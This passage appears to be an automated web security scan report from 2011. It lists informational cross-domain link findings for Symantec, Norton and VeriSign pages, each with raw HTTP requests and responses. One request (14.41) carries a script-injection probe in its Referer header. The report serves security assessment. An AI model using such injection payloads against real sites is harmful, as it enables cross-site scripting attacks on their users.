14.33. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.symantecstore.com
Path:	/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7

Issue detail

The page was loaded from a URL containing a query string:

http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7?inid=us_hho_homepage_hero_windows7

The response contains the following link to another domain:

http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7?inid=us_hho_homepage_hero_windows7 HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7
Content-Length: 281
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7">here</a>
...[SNIP]...

14.34. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.symantecstore.com
Path:	/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/

Issue detail

The page was loaded from a URL containing a query string:

http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/?inid=us_hho_homepage_hero_nisnavstore2010

The response contains the following link to another domain:

http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/?inid=us_hho_homepage_hero_nisnavstore2010 HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:37 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010
Content-Length: 288
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010">here</a>
...[SNIP]...

14.35. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.symantecstore.com
Path:	/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400

Issue detail

The page was loaded from a URL containing a query string:

http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400?inid=us_hhobanner_nisnaveol

The response contains the following link to another domain:

http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400?inid=us_hhobanner_nisnaveol HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol
Content-Length: 274
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol">here</a>
...[SNIP]...

14.36. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.symantecstore.com
Path:	/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/

Issue detail

The page was loaded from a URL containing a query string:

http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/?inid=us_hho_homepage_hero_nisnustore2010

The response contains the following link to another domain:

http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/?inid=us_hho_homepage_hero_nisnustore2010 HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:36 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010
Content-Length: 287
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010">here</a>
...[SNIP]...

14.37. http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.symantecstore.com
Path:	/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300

Issue detail

The page was loaded from a URL containing a query string:

http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300?inid=us_hhobanner_pc_powerboost_2008

The response contains the following link to another domain:

http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008

Request

GET /store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300?inid=us_hhobanner_pc_powerboost_2008 HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008
Content-Length: 283
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008">here</a>
...[SNIP]...

14.38. https://ssl-certificate-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The page was loaded from a URL containing a query string:

https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH

The response contains the following links to other domains:

https://ssl.google-analytics.com/urchin.js
https://www.verisign.ch/repository/index.html
https://www.verisign.ch/repository/legal-notices.html
https://www.verisign.ch/repository/privacy.html
https://www.verisign.ch/ssl/buy-ssl-certificates/index.html
https://www.verisign.com/js/mbox.js

Request

GET /process/retail/console_login?application_locale=VRSN_CH HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34E1AEF0DB2D10DB645D8BD14E31479C; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...
<p>To buy, renew or replace a certificate and get your VeriSign.. Trust Center sign-in, go to <a href="https://www.verisign.ch/ssl/buy-ssl-certificates/index.html" target="_blank">Buy SSL Certificates >></a>
...[SNIP]...
<div class="inlineimg" style="padding-left:0px"><a target="_blank" href="https://www.verisign.ch/repository/legal-notices.html">Legal Notices</a>
...[SNIP]...
<div class="inlineimg"><a target="_blank" href="https://www.verisign.ch/repository/privacy.html">Privacy</a></div><div class="inline"><a target="_blank" href="https://www.verisign.ch/repository/index.html">Repository</a>
...[SNIP]...

14.39. https://ssl-certificate-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The page was loaded from a URL containing a query string:

https://ssl-certificate-center.verisign.com/process/retail/console_login?application_locale=VRSN_US

The response contains the following links to other domains:

https://cert.webtrust.org/ViewSeal?id=304
https://ssl.google-analytics.com/urchin.js

Request

GET /process/retail/console_login?application_locale=VRSN_US HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=3597AA5CDB2D10DB49F0B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...
<div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"><img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">
...[SNIP]...

14.40. http://store.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://store.symantec.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://store.symantec.com/?inid=us_pagenotfound_smb_store

The response contains the following links to other domains:

http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js
http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js
http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js
http://ajax.microsoft.com/ajax/jquery.ui/1.8.9/themes/cupertino/jquery-ui.css

Request

GET /?inid=us_pagenotfound_smb_store HTTP/1.1
Host: store.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:30:57 GMT
Content-Length: 18197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">

<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js" type="text/javascript"></script>
<script src="http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js"
type="text/javascript"></script>
...[SNIP]...

<link href="http://ajax.microsoft.com/ajax/jquery.ui/1.8.9/themes/cupertino/jquery-ui.css" rel="stylesheet" type="text/css" /><title>
...[SNIP]...

<script src="http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

14.41. https://symantec-corporation.com/servlet/campaignrespondent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://symantec-corporation.com
Path:	/servlet/campaignrespondent

Issue detail

The page was loaded from a URL containing a query string:

https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004

The response contains the following links to other domains:

https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp
https://www-secure.symantec.com/about/profile/policies/legal.jsp
https://www-secure.symantec.com/about/profile/policies/privacy.jsp
https://www-secure.symantec.com/css/20081218/business.css
https://www-secure.symantec.com/css/20090521/symantec.css
https://www-secure.symantec.com/feedback/contactus.jsp
https://www-secure.symantec.com/globalsites/index.jsp
https://www-secure.symantec.com/images/masthead/symantec.gif
https://www-secure.symantec.com/index.jsp
https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=
https://www-secure.symantec.com/rss/index.jsp
https://www-secure.symantec.com/script/20080114/swfobject.js
https://www-secure.symantec.com/script/omniture/om_code.js
https://www-secure.symantec.com/script/omniture/s_code.js
https://www-secure.symantec.com/scripts/icrossing/i2a.js
https://www-secure.symantec.com/sitemap/index.jsp
https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js

Request

GET /servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 HTTP/1.1
Host: symantec-corporation.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:30 GMT
P3P: policyref="http://policy.responsys.net/w3c/response.xml", CP="NON DSP COR IVAi IVDi OTRi IND ONL"
Pragma: no-cache
Cache-Control: no-cache, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 36800

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Symantec Enterprise Sales Contact Center</title>
<meta content="veritasnonconsumer" name="om.environment"
...[SNIP]...
<meta content="en/us: biz: contactcenter: form" name="om.page_name" />
<link rel="stylesheet" href="https://www-secure.symantec.com/css/20090521/symantec.css" />
<link rel="stylesheet" href="https://www-secure.symantec.com/css/20081218/business.css" /><script src="https://www-secure.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
</script><script src="https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js" language="javascript" type="text/javascript"></script><script src="https://www-secure.symantec.com/script/20080114/swfobject.js" language="javascript" type="text/javascript"></script><script src="https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=" language="javascript" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript"
src="https://www-secure.symantec.com/scripts/icrossing/i2a.js">
</script>
...[SNIP]...
<div class="symLogo"><a href="https://www-secure.symantec.com/index.jsp"><img title="Symantec Corporation | United States" alt="Symantec Corporation" src="https://www-secure.symantec.com/images/masthead/symantec.gif" /></a>
...[SNIP]...
<span><a title="Site Map" href="https://www-secure.symantec.com/sitemap/index.jsp">Site Map</a>
...[SNIP]...
<span><a title="Legal Notices" href="https://www-secure.symantec.com/about/profile/policies/legal.jsp">Legal Notices</a>
...[SNIP]...
<span><a title="Privacy Policy" href="https://www-secure.symantec.com/about/profile/policies/privacy.jsp">Privacy Policy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a title="Contact Us" onMouseOver="showdiv(4)" onMouseOut="hidediv(4)" href="https://www-secure.symantec.com/feedback/contactus.jsp">Contact Us</a>
...[SNIP]...
<span><a title="Global Sites" href="https://www-secure.symantec.com/globalsites/index.jsp">Global Sites</a>
...[SNIP]...
<span><a title="License Agreements" href="https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp">License Agreements</a>
...[SNIP]...
<span><a title="RSS" href="https://www-secure.symantec.com/rss/index.jsp">RSS</a>
...[SNIP]...
</p>
<script src="https://www-secure.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...

14.42. https://trust-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The page was loaded from a URL containing a query string:

https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH

The response contains the following links to other domains:

https://ssl.google-analytics.com/urchin.js
https://www.verisign.ch/repository/index.html
https://www.verisign.ch/repository/legal-notices.html
https://www.verisign.ch/repository/privacy.html
https://www.verisign.ch/ssl/buy-ssl-certificates/index.html
https://www.verisign.com/js/mbox.js

Request

GET /process/retail/console_login?application_locale=VRSN_CH HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=371EA2F4DB2D10DB68CCA5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...
<p>To buy, renew or replace a certificate and get your VeriSign.. Trust Center sign-in, go to <a href="https://www.verisign.ch/ssl/buy-ssl-certificates/index.html" target="_blank">Buy SSL Certificates >></a>
...[SNIP]...
<div class="inlineimg" style="padding-left:0px"><a target="_blank" href="https://www.verisign.ch/repository/legal-notices.html">Legal Notices</a>
...[SNIP]...
<div class="inlineimg"><a target="_blank" href="https://www.verisign.ch/repository/privacy.html">Privacy</a></div><div class="inline"><a target="_blank" href="https://www.verisign.ch/repository/index.html">Repository</a>
...[SNIP]...

14.43. https://trust-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The page was loaded from a URL containing a query string:

https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US

The response contains the following links to other domains:

https://cert.webtrust.org/ViewSeal?id=304
https://ssl.google-analytics.com/urchin.js

Request

GET /process/retail/console_login?application_locale=VRSN_US HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:49 GMT
Server: Apache
Set-Cookie: TLTHID=38B3ED90DB2D10DB52A19F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...
<div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"><img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">
...[SNIP]...

14.44. https://trust-center.verisign.com/process/retail/trust_product_selector previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector

Issue detail

The page was loaded from a URL containing a query string:

https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001

The response contains the following links to other domains:

https://cert.webtrust.org/ViewSeal?id=304
https://ssl.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
</script>
<script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...
<div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"><img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">
...[SNIP]...

14.45. http://updatecenter.norton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://updatecenter.norton.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://updatecenter.norton.com/?NUCLANG=en

The response contains the following links to other domains:

http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0
http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=150
http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=151
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:ENG&ssdcat=270
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=272
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc
http://www.facebook.com/Norton
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FNorton&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&font=&height=21&locale=en_US&ref=NortonUpdateCenter

Request

GET /?NUCLANG=en HTTP/1.1
Host: updatecenter.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:46:03 GMT
Connection: close
Content-Length: 25405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir = "ltr">
<head id="ctl00_Head1"><t
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc">Norton Online Family</a>
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc">Norton Online Backup</a>
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc">Norton Management</a>
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc">Norton Safe Web</a>
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc">Norton Account</a>
...[SNIP]...
<li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc">Norton.com</a>
...[SNIP]...
<li><a href="http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0">Leave Feedback</a>
...[SNIP]...
<li><a href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:ENG&ssdcat=270">Customer Support</a>
...[SNIP]...
<div class="nortonFbLink">
<a target="_blank" href="http://www.facebook.com/Norton"><span class="name">
...[SNIP]...
<div class="socialWidgets">
<iframe class="fbLikeIFrame" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FNorton&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&font=&height=21&locale=en_US&ref=NortonUpdateCenter" scrolling="no" frameborder="0" style="border: none;
overflow: hidden; width: 160px; height: 21px;" allowtransparency="true"></iframe>
...[SNIP]...
<li>
<a target="_blank" href='http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=151'>Legal Notices</a>
...[SNIP]...
<li>
<a target="_blank" href='http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=150'>Privacy Policy</a>
...[SNIP]...
<li>
